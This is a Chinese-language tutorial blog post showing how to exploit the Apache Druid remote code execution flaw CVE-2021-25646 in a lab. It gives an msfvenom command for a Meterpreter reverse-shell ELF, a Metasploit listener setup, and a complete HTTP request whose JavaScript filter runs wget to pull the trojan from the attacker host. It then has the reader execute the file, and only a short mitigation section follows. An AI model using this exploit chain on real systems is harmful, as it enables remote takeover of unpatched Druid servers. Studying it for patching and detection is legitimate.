您好,登錄后才能下訂單哦!
這篇文章給大家介紹如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
Apache Druid 是用Java編寫的面向列的開源分布式數據存儲系統,旨在快速獲取大量事件數據,并在數據之上提供低延遲查詢。
近日Apache Druid官方發布了安全更新,修復遠程代碼執行漏洞(CVE-2021-25646)
Apache Druid含有能夠執行嵌入在各種類型請求中由用戶提供的JavaScript代碼功能。此功能適用于高度信任環境,且默認情況下已禁用。但是,在Druid 0.20.0及更早版本中,經過身份驗證用戶可以構造傳入json串來控制某些參數發送惡意的請求,強制Druid為該請求運行用戶提供的JavaScript代碼。由于Apache Druid默認情況下缺乏授權認證,攻擊者可以利用此漏洞在目標機器上執行任意代碼,最終可獲取服務器的控制權限。
本次使用的攻擊機地址為:192.168.159.131 靶機地址:192.168.159.139
1、使用MSF生成反彈shell的木馬程序,命令為:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.159.131 LPORT=5555 -f elf > reverse.elf
備注:我這邊使用的靶機是64位系統,所以選擇的x64攻擊負載,32位系統可以選擇x86
2、在攻擊機上使用python開啟web服務,下文將通過Apache Druid 遠程代碼執行漏洞執行wget命令,從剛搭建的web服務商下載msf生成的reverse.elf文件
3、使用MSF開啟監聽模塊,命令為:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.159.131
set lport 5555
run
1、從https://github.com/apache/druid/releases/tag/druid-0.19.0下載Druid0.19版本,如下圖所示
2、使用docker搭建Druid漏洞環境,解壓下載的文件,進入druid-druid-0.19.0/distribution/docker路徑使用docker-compose up –d搭建漏洞環境,完成之后訪問http://192.168.159.139:8888
3、將下面的poc復制到burpsuit的repeater模塊,攻擊載荷中最終執行的命令為:wget http://192.168.159.131:888/reverse.elf,從搭建的web服務器上將反彈shell木馬程序下載到靶機上
POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.159.139:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json;charset=UTF-8
Content-Length: 931
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
"function": "function(value){return java.lang.Runtime.getRuntime().exec('wget http://192.168.159.131:888/reverse.elf')}",
"dimension": "added",
"": {
"enabled": "true"
}
}
}
},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
4、將下載到靶機上的reverse.elf惡意程序賦予可執行權限,命令為:chmod a+x reverse.elf
5、執行reverse.elf程序,執行命令為: ./reverse.elf
6、msf成功收到反彈的shell
Apache Druid <= 0.20.0
高危
Apache Druid 官方已在新版本中修復此漏洞,請升級至0.20.1及以上版本,下載鏈接:https://github.com/apache/druid/releases/tag/druid-0.20.1
若暫時無法升級,可以通過以下方法臨時緩解影響:
設置網絡訪問控制策略,只允許可信任的內網IP訪問Druid。
引入druid-basic-security擴展添加授權認證。
關于如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。